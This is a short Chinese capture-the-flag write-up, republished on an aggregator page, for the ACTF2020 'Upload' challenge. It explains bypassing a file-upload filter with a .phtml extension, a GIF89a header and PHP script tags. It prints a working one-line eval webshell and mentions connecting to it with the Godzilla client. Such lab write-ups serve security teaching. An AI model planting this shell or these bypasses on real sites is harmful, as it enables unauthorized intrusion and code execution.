当前位置: 首页 > news >正文

[ACTF2020 新生赛]Upload

     先写一个万能的一句话木马

  • 使用一句话木马

  • 发现这个是有内容过滤的 过滤了 <?

  • 发现这个过滤的很死
  • 那就只能使用 不带 ? 的短标签了 使用script 标签 这个的使用只限于对方的php是5版本的

  • 正好是低版本的

  • 所以直接上传 改一下后缀为 phtml

  • 成功上传 但是我们没有找到具体的上传地址 :1、目录扫描 2、猜一下是不是 upload 目录
  • 发现猜对了

  • 哥斯拉链接

  • 找一下flag

  • flag{537f95ae-87a4-43f4-973a-1492ae8a92af}
  • 知识点 : 1、php 后缀的绕过 : phtml
  • 2、 php短标签的绕过(只有php版本为5开头的才行) :
  • GIF89a // 这个是万能标签 防止 MIME 检查文件头
  • <script language="php">
  • eval($_POST['pass']);
  • </script>

相关文章:

  • 大模型API密钥的环境变量配置(大模型API KEY管理)(将密钥存储在环境变量)(python-dotenv)(密钥管理)
  • 编译原理实验 之 Tiny C语言编译程序实验 语法分析
  • 李臻20242817_安全文件传输系统项目报告_第9周
  • w~嵌入式C语言~合集4
  • flask uri 怎么统一加前缀
  • 【Web API系列】深入解析 Web Service Worker 中的 WindowClient 接口:原理、实践与进阶应用
  • Spring框架的ObjectProvider用法
  • C#通过NTP服务器获取NTP时间
  • 鸿蒙版电影app设计开发
  • 鸿蒙NEXT开发正则工具类(ArkTs)
  • django admin 设置字段不可编辑
  • php安装swoole扩展
  • 【halcon】tuple_sort_index 和 select_obj 配合使用 详解
  • [特殊字符]实战:使用 Canal + MQ + ES + Redis + XXL-Job 打造高性能地理抢单系统
  • ASP.NET图片盗链防护指南
  • 总线位宽不变,有效数据位宽变化的缓存方案
  • 概率论与统计(不确定性分析)主要应用在什么方面?涉及到具体知识是什么?
  • 深入解析 npm 与 Yarn:Node.js 包管理工具对比与选型指南
  • 考研系列-计算机组成原理第五章、中央处理器
  • Spring Cloud Stream喂饭级教程【搜集全网资料整理】
  • 安阳一村支书微信群骂村民被警方行拘,辩称对方先“污蔑造谣”
  • 上海数学教育及数学科普专家陈永明去世,享年85岁
  • 李公明|一周画记:哈佛打响第一枪
  • 从“网点适老化”到“社区嵌入式”,“金融为老上海模式”如何探索?
  • 我国核电总体规模首次跃居世界第一,发电量持续增长
  • 涨价应对关税变化是短期之策,跨境电商塑造新品牌开辟“新蓝海”